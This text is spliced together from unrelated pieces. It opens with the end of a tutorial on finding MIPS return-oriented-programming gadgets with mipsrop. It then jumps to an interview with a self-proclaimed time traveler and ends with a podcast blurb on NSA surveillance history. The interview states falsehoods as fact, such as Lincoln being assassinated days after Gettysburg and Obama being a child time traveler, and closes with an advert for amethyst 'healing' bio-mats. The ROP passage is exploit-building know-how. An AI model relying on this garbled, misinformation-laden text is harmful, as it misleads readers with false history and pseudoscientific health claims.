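The jalr at 0x28BDC is dropped because its $t9 came from the GOT, which the attacker does not write; the jalr at 0x28BEC is kept because $t9 was copied from $s0, and the jr at 0x2FFE8 is additionally flagged as an indirect return because $ra is reloaded from 0x24($sp) before the jump. On a real target the distance from the overflowed buffer to the saved registers, and their order, come from the vulnerable function's prologue, not from this script.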
A few other mipsrop methods you might want to play with are:
There are also some more examples/screenshots in the repository’s README file. Happy ROPing!
Andy, you have already travelled through time several times. Tell us your secret: how did you do it?
I was one of 140 children taking part in DARPA's secret space-time project "Pegasus". In the late 1960s and early 1970s we were sent into the past to gather information with which the events of the future were to be influenced. They called us chrononauts. On the basis of Tesla documents that had been kept secret, the developers managed to build a time portal that used "radiant energy", a universal force that bends space-time and thus enables real-time teleportation as well as time travel. We stepped into the energy field that formed between two elliptical pillars, a kind of stargate, and fell through a wormhole that spat us out again somewhere.
What were the greatest difficulties on your journey?
After arriving I mostly felt feverish and dizzy, and often had trouble orienting myself. Quantum fluctuations occurred too, and then the speed of time would waver. We were given precise instructions beforehand on how to behave. The easiest thing, though, was to ask the first person you met for directions. People were sometimes startled when we just appeared out of nowhere like that.
What is the best thing about time travel?
I have experienced many unusual things that others only know from boring history books. For example, I was at Abraham Lincoln's speech in Gettysburg a few days before his assassination. And I have also been on Mars, together with Barack Obama, who by the way was also one of us child chrononauts.
I find it very frustrating that I am now portrayed as a crank and a liar and nobody seems to believe me, no matter how much detail I give about the events and whatever evidence I present.
Which three things do you take with you on every time journey?
I never took anything with me except the clothes I was wearing. Before our departure we were fitted out in period style from a costume store. On my trip to Gettysburg, on 19 November 1863, I lost my shoes, a sock and my hat in the wormhole. A friendly old gentleman, whom I later identified as John Lawrence Burns, helped me out after my arrival with new shoes, which he padded with wrapping paper. I can prove it. There is a photo from the period, presumably taken by the Civil War photographer Matthew Brady. It shows Lincoln at his speech in Gettysburg; in the foreground you can see me, looking somewhat lost, as a 10-year-old in the far too big borrowed shoes.
Clicking on the photo leads to a detailed account of the events by chrononaut Andrew D. Basagio (video).
Why have you only now decided to report on your experiences?
Well, the world is going down the drain. I have seen the future with all its catastrophes. That is why I want to get the US government to finally reveal its teleportation secret, so that humanity still has a chance in the 21st century to achieve the sustainability of our planet. We can change the future by aligning our thoughts energetically accordingly. Particularly suited as a foundation for this are the original infrared bio-mats made from 17 layers of space-age material with negative ion energy and the healing power of amethysts, which you can conveniently order via my website...
Content-wise it is of course about the NSA, but we thought we shouldn't just do "HAHA WE TOLD YOU SO" and instead use the opportunity for an overview of the history of eavesdropping, encryption and the breaking of encryption.
By the way, Chrome has meanwhile built in support for Opus, but it is not enabled by default. Open a tab with "about:flags" and search for Opus there. If you enable that, the download size shrinks considerably.
At almost three hours the episode has turned out quite long. We felt that after the long break we should rather do a somewhat longer episode than a normal-length one. There is a lot to say on the topic, after all.
Enjoy listening!